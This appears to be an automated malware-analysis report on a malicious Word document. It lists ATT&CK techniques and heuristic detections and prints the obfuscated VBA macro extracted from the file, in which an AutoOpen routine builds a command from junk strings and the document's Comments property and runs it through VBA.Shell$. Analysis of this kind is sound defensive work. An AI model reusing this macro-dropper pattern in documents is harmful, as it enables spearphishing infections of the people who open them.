MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including an autoopen macro, which is a common technique for malicious documents. Heuristics indicate the presence of PowerShell commands and a potential shell call within the VBA code. The ClamAV signature 'Doc.Macro.DollarShell-6346616-0' further confirms its malicious nature. The VBA script appears to be obfuscated, but the presence of PowerShell execution suggests it's designed to download and run a secondary payload.
Heuristics 8
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
aDXAewB = "pDvhfMFbg" + "dzutbFmxkcp" + "muVLeBDwmuv" + "CpdTDEzhsCr" + "TvkRsmhtEu" + "GhDgdNDMm" + "hTbVunBCc" + aWStBuE = "ttsZTpeGS" + "FRCaatWCedF" + "mPByBnXpY" + "AWTkfbmKWEf" + "bGMkSzFYBkN" + "YsvUteG" + "TaHmDcL" + "zRmehSgE" VBA.Shell$ "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ffxpnwNrVDp + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + CDnBkkBh, 0 EPupkmtva = "mBSdBRxC" + "DfXzmvdbXvX" + "XAFsuUWks" + "BafXsBUAfsr" + "GPhfGRnwef" + "kKnweMN" + "whCwXHHWfH" + hWhvANBw = "aAwapfAKdE" + "KNUDLwg" + "fpTevYWZ" + "BSMEdDBxyA" + "vzDUnaERvnG" + "bpEbSYeDHP" + "HcuXVnr" + dzapDpEg = "CreGSvFP" + "ytaKvrkZEb" + "pbkSexGt" + "GkRBUTyB" + "VFaVrCuy" + "FMPBenLd" + "tZMgVLGE" + ykPaTMF = "VGBsUeFs" + "kNnwrZymF" + "THuxgck" + "ypRWKNEphU" + "duwtfaA" + "BxmGSnAeZZ" + "YDvTeEXpR" + rPTAMweGzte = "zGRRxbkra" + "cLrKpkwhBfy" + "KKDamAx" + "zwxxFGrVxR" … -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() seHKzkcdPFR -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8718 bytes |
SHA-256: 143acb5815e8b93ad91658706785b73307ed532be7472744f31e3d66feda2bce |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
484 of 586 identifiers look randomly generated (e.g. 'WwHwytdYBzh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
seHKzkcdPFR
End Sub
Function seHKzkcdPFR()
vtRZabSX = "shGtPsE" + "ThWKMfvu" + "hYFHkybZ" + "bRyNPbhFy" + "emwbgmmr" + "SkDHPka" + "DxTrPSEe" + rrYbUbs = "YuCnGZhL" + "LXVcxLvg" + "FMBkmTKMZ" + "svZsRMscgs" + "ghhdzMB" + "zZcKauZdwx" + "uYLnudsK" + UpFZwRKzx = "CLxGZRWmv" + "fgLKURHewv" + "eTwcHcFZRx" + "KZNVrCChX" + "gGzZZuwhk" + "MDyCXUMhn" + "rsgKwZG" + "uMrwgvrszBv"
aFakRGgNdhh = "sRkRYWsep" + "ZTkYTShR" + "weZHAEfaED" + "xNebRXYnKT" + "GthYAfxn" + "cGZgvzFW" + "CvMUbbuHLvc" + nSNVdrn = "BkfPtpvt" + "PGCkrvVfKb" + "xuuWdWMFnP" + "FnyesexB" + "VpzcHgP" + "VvDnRRdZ" + "sKPKLmty" + "zdAuahDXMH"
SgFghVUFvr = "SLWeUMpU" + "gcBAWDy" + "ZAWukrpttU" + "gszFUhM" + "MhaGPMhFUUe" + "ybeEhdukncD" + "ZfvMsShW" + LFXbcyXZ = "FzDZzPav" + "NTVGHKMm" + "WAsSMSnue" + "GnEwHcxC" + "aTSHtcPGAFS" + "DWDvaAsz" + "NrXEbFA" + hRBmuBM = "cHBuUGg" + "pvVndbY" + "wHcBysbg" + "hCkEUPD" + "fLaBsHtL" + "YGRYYvWuH" + "dzegmHWSa" + CGPaECXfs = "VecGrMMh" + "LMfgCLUeVKF" + "AvHBfvgH" + "NkxZtky" + "tmnFwKmMKU" + "mmbMcNc" + "UHceHCWHW" + "cwcPfWt"
yAgckpFzyW = "ccLMwstMgHw" + "GVzRRwrVzsz" + "KEdXnLp" + "adEtGdMKGb" + "dSBuZTugnKE" + "XTDApPTxhUd" + "atGZRzu" + PCfbEnVnPC = "ubsyVmpuuDX" + "bbnNvUREAhA" + "PyftNfT" + "MbXcVcCbTLw" + "dBMMYUgzaCh" + "ezZCefneaH" + "ppctaGLx" + dpwLTZEnHMy = "vWMddDMwCr" + "eydvtytbxr" + "xcGcKkV" + "uUWXrSUz" + "HtVGFrRDaf" + "YbuRfSVFVd" + "RLPtteC" + LCbGYeau = "ZNnnVyx" + "duvhPfCxfFp" + "ADNDUtGZUk" + "gyEtcLUFeB" + "YkgGxNuRB" + "vFLNHKvGEZ" + "vnwbMrdHtRR" + pKUUMMC = "RkvKWYLUy" + "fYMGMfMDT" + "GdxuvfNuHf" + "ULGNsUzgDa" + "WfkRgnMkMf" + "PFpXTaE" + "GnapBkZ" + "KwEgDpLDMT"
esRLTXpTvT = "bexxsgh" + "BzUnFyX" + "SntErFwm" + "pUZVavvu" + "PupndUBN" + "HAAyFxRd" + "hRYawBXRZXz" + svkCMNAazkP = "yNxfKzSBEw" + "SkUbzCEkV" + "hxBEaruFnbH" + "ZrFfcCveBw" + "xhLLkbWY" + "aGcnkmtM" + "UpyUSpdT" + vsyaEApPAnW = "SczGyMau" + "SnZSVWXKXRe" + "dbgbbTbtNM" + "PYhdGMCvDX" + "pnSTZGLKBA" + "YNWybSCW" + "sphHxTxv" + "gFrXXXvexhE"
hPWEEBGRytp = "MphscNy" + "ZdxaTeerSmT" + "hSXDFhFBkFx" + "PfTbgBKfuP" + "cvTwsXEx" + "RMfVdkYDfL" + "LZLTbrrymt" + HXwaeMRnxNw = "WsyvCLDMW" + "wpSbKhSLW" + "VSGcdBfTu" + "KAtRuuGB" + "pTGbSxfxrce" + "HadDXAWnC" + "zcRPVWLK" + CKbBdxYTmm = "RTprmZrGZVV" + "hDRAmbRD" + "dGZpkPLEuw" + "AGUBkMNs" + "sgcDWfuwbKT" + "RDkrrmpy" + "vSVVmfu" + UUzRFsxH = "KtccKvtk" + "ADaMkUtgD" + "GuaEwFeBL" + "hasunDeb" + "NYGYKZksmen" + "BVbLUUbTFYW" + "hSAHczmFxTE" + tUXFSVVu = "uXvFpwKax" + "nHnZPhzFN" + "kbhUThsSepk" + "egpvwFSSmxy" + "YwdhkPzMBG" + "HaCEySp" + "ekLxTBZXNh" + "MdCfPZe"
ffxpnwNrVDp = "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + KHLMdAam
CyXexBRs = "sNKnwCWh" + "RgrLxdarRHY" + "FDaVPAWEwb" + "gHYkndNMKVp" + "zdWTTBBkCnt" + "PhpARSHUze" + "BUYZpndP" + PVZgNsEfD = "EMNsdKXdWEK" + "fcaKnCnWXL" + "aZEyFhVt" + "uAnBgyzLLHp" + "UgwtueSwPd" + "ZSNfteDgMGc" + "kMskzHrUPFG" + eEuLzNm = "haXGvFBSdL" + "sVXTMZeFt" + "dGRZcXhCNHS" + "BcSZguHGM" + "EThCEndW" + "CGUYLCksN" + "LWhaUUaRBfU" + "EYtbMRNMU"
aDXAewB = "pDvhfMFbg" + "dzutbFmxkcp" + "muVLeBDwmuv" + "CpdTDEzhsCr" + "TvkRsmhtEu" + "GhDgdNDMm" + "hTbVunBCc" + aWStBuE = "ttsZTpeGS" + "FRCaatWCedF" + "mPByBnXpY" + "AWTkfbmKWEf" + "bGMkSzFYBkN" + "YsvUteG" + "TaHmDcL" + "zRmehSgE"
VBA.Shell$ "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ffxpnwNrVDp + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + CDnBkkBh, 0
EPupkmtva = "mBSdBRxC" + "DfXzmvdbXvX" + "XAFsuUWks" + "BafXsBUAfsr" + "GPhfGRnwef" + "kKnweMN" + "whCwXHHWfH" + hWhvANBw = "aAwapfAKdE" + "KNUDLwg" + "fpTevYWZ" + "BSMEdDBxyA" + "vzDUnaERvnG" + "bpEbSYeDHP" + "HcuXVnr" + dzapDpEg = "CreGSvFP" + "ytaKvrkZEb" + "pbkSexGt" + "GkRBUTyB" + "VFaVrCuy" + "FMPBenLd" + "tZMgVLGE" + ykPaTMF = "VGBsUeFs" + "kNnwrZymF" + "THuxgck" + "ypRWKNEphU" + "duwtfaA" + "BxmGSnAeZZ" + "YDvTeEXpR" + rPTAMweGzte = "zGRRxbkra" + "cLrKpkwhBfy" + "KKDamAx" + "zwxxFGrVxR" + "rNbbFEtxW" + "YhZKzxFTAV" + "xWHTWfMSXv" + "dgpTEdxASXy"
YZNymSgfsR = "BcenFSdbCsN" + "EkNywSGwVVb" + "yNFLuuaTznD" + "eZWMmndaRF" + "aYSavbDmVs" + "LXXAdau" + "SwFtCsp" + NKCHapn = "deVXyDFeN" + "vyLdGMB" + "tSWASKhcsw" + "tycVLwPZDrb" + "aeUWfnvxkK" + "zySzEkrDrF" + "aBVnEXD" + gHbzKMEwbC = "PPdWRffvN" + "vbyLsheBy" + "ZGsYbxN" + "KawkDzBpYCg" + "TUpfLauXC" + "aRChxaFK" + "YpfCrXUmhvN" + FcuUVanAGA = "dBytenFw" + "dtzRDNCFMKr" + "nCumKSkHBRT" + "FHLCLxRXA" + "EfPrFaST" + "MxEKnFFChEZ" + "VDpnPasZ" + "YGWUTcFWreH"
aAFKUKhsg = "EsrShMyF" + "DCPEwwvAaZ" + "pXxndaZb" + "rTBTbymsF" + "KPSwcCXu" + "cuZwhWrxAD" + "yTzUNZkWES" + GswFPsAXA = "kbLSYTy" + "TdpaStFF" + "cddrBwCD" + "UzUtUKLYFm" + "wyUuVFfrH" + "DWTWHBxPyz" + "brVDTDFLYE" + GapMZeAN = "WtgrrhfzzA" + "LEraMzD" + "VydtRBK" + "WswXFwz" + "dfXkcHLVex" + "gBYuXKLFS" + "cXuEenHrV" + ukGCHmF = "YssMLBtytWp" + "tMympmerhp" + "YkxTBKWp" + "YvVXVSBV" + "mfgEWyrVx" + "wwUHeneW" + "LVhfKntT" + wCByRkTCEC = "cCnfAhk" + "VULgmMcL" + "tMeentL" + "WUdGAnNeMh" + "knbdKHHf" + "gCUAGwkw" + "BdMGRsxRmCm" + ApwtDVcUUPt = "ayKAKTUUcah" + "TaGPZUttK" + "DasbnEGvP" + "ssCRcKPL" + "tACwuSFkBSV" + "YaHsWmbBc" + "SmgwcuhArdw" + "dedxCFg"
TWYATfSxCsP = "xWgUAMV" + "ThfsWYAupnA" + "SUvsHKWdA" + "VavpcveVhfb" + "rZtzAuhDgB" + "zRsGSpRBPW" + "MmzaGFhAD" + TbssXKE = "ssTwcUTk" + "MpxybRnpW" + "MzwbCAWwM" + "VPrftYCHgD" + "PGHNAdFkCEZ" + "YeAcKpBamT" + "LAwxTnrD" + hAzmBEUky = "eAWSuvxzgY" + "EnbNbFbbnNm" + "LLkWVYg" + "BkESmkMT" + "ZZpudLG" + "GvTKtKCD" + "fXFLhDMnG" + YsvYmAa = "UdTWeGTDCyr" + "VaZrkmTk" + "TKGwrWf" + "ycCNeZXFt" + "bhGVHGHE" + "FPELsbPeFN" + "nZnuBarLPu" + NSNCeFZSZBc = "UZTDrReRWU" + "SLHAwAGYWE" + "nVGmRatHm" + "WwHwytdYBzh" + "GphVCWG" + "xrFKfpXF" + "KaxkhMBmAfa" + "ALKWsgcpnM"
FtdTgAHWRZ = "EbsBuhzPTD" + "ysdXCYaTm" + "YASAwVgd" + "BGwHBBmVNAR" + "VurNmhhWYB" + "mkZcNcGbHRD" + "SraCbwLbCR" + tfpzRGGEU = "acKNrCSLYmE" + "ZZtMFsm" + "htaxysGC" + "BUSuuTyu" + "yDgHkhzh" + "xczhzGNw" + "MzKTdLA" + hhdrvLVxC = "esZmFStC" + "BcubaLhTs" + "PMZFayk" + "NUYFcehWzdd" + "ZYRyreLHm" + "baUxyEn" + "FrXyecDpYUa" + wwWaSYgnL = "mUXRcskBg" + "DmPbFMTDC" + "DzynkmUtdp" + "LvmTkRM" + "mgMnbXXnU" + "mbDwWETR" + "HfMunkN" + uEMaRSr = "NWAZULTt" + "sfUBNAt" + "nceEAKz" + "aWmwxthSHS" + "EznLRxveW" + "gbEEZknRd" + "TaDFyMmA" + ZyecenZkMX = "EvPuWpr" + "PcNkdvggXZx" + "ZLGhGxyNCXy" + "LkgKHhgsU" + "pfwVBRPfT" + "YCuBWEzk" + "RtybwELN" + "taexZWn"
LTVwCahheyr = "MBgyXcm" + "cKbhaubzP" + "hctUSKRVzG" + "NcLMZmD" + "nCxSpAkLz" + "vTeDDYpWp" + "xzwbExcgaaf" + yskgvcMre = "TndunLufbPM" + "TEKbTuZWD" + "fTZTkxZZbcg" + "VfgUbBXBcvg" + "tcfpfERb" + "SeaVTaN" + "wuTMUDMgZ" + amneDeAD = "SdTpzKCMp" + "DKHeRhmfMCp" + "mYXtsXehzkb" + "NWndSxtu" + "rHgSPaY" + "aywZUVwPzxy" + "kvXeAeEdEZy" + gunARyn = "yuEkXxexAYr" + "yRMxfkMHf" + "wnctRwTsdcb" + "MtetMGmF" + "VVZHSmFEVV" + "tzkgeWrexP" + "uXnfZvbAy" + "HPvNTkevvzu"
FsrnUsK = "gwYFzeVY" + "vkHBDbPgva" + "CypaCYTXsF" + "UMeLTrMuMEp" + "gKpwXeVVyM" + "KPCMtrzv" + "RhChrYUhWEK" + vfbswyrx = "KdtVRXn" + "xSLeaXrAUk" + "aLRsEDpLKb" + "pNpwASRYunL" + "pxppTUcGUna" + "AFuGSAAgv" + "rNVPTGLph" + nGKNtMeCn = "vRGxbDdDK" + "wvSBUSYsYT" + "bXUsdfpTXW" + "nVdwfgW" + "ryhLMzemM" + "gMCZtWrhcBf" + "BkxtHLmWE" + ESTZhvxMask = "aEbPgSaMTXe" + "sBLwYUss" + "yCUyUxZdk" + "FDHrDGZe" + "PAmGXmd" + "aaPDuDDBy" + "zaFSdgZGgP" + YnpKeFraH = "YVKcseC" + "HLUvUATEVf" + "tddxPHR" + "cZuwHYZ" + "ukmUEFUAh" + "ceUDAZyMW" + "MySXnxhf" + TZemdBCwB = "LbMunRLs" + "YWyvwNMGy" + "hAakeNMfA" + "MYVvtmU" + "SVGZGSZSrm" + "YSvauRSyZvw" + "ckKtKXwdpcf" + "cXmPgKt"
XrykMLRNdR = "rZWGbKMxNb" + "uPNaWehsrP" + "UtgGRdDf" + "bUBWzTUFaPh" + "WEmkMMPHc" + "XMrpyRvSY" + "tCGSzrwLw" + eMtzfYXrxT = "mbxDWGdShx" + "ArdgVug" + "XzErHhdr" + "XAfDYDKPF" + "WNFkgwz" + "EMMPNxNrEzT" + "hYzgyLnWh" + WZEZMNCD = "rDLyPhLdMb" + "RTGDcTXsbE" + "DVBDCgXd" + "WdNBndCydSa" + "xnkBGUxLPu" + "FHtWfbvNRS" + "DtuUDXdpcrR" + apLUnDGe = "ceHLyhEHLaz" + "vKStFgB" + "crYGnEnHfyU" + "bkgrvKNkxB" + "MgRghYt" + "vyGtvpYnv" + "HhhXnPTh" + "BDhhPzARgy"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.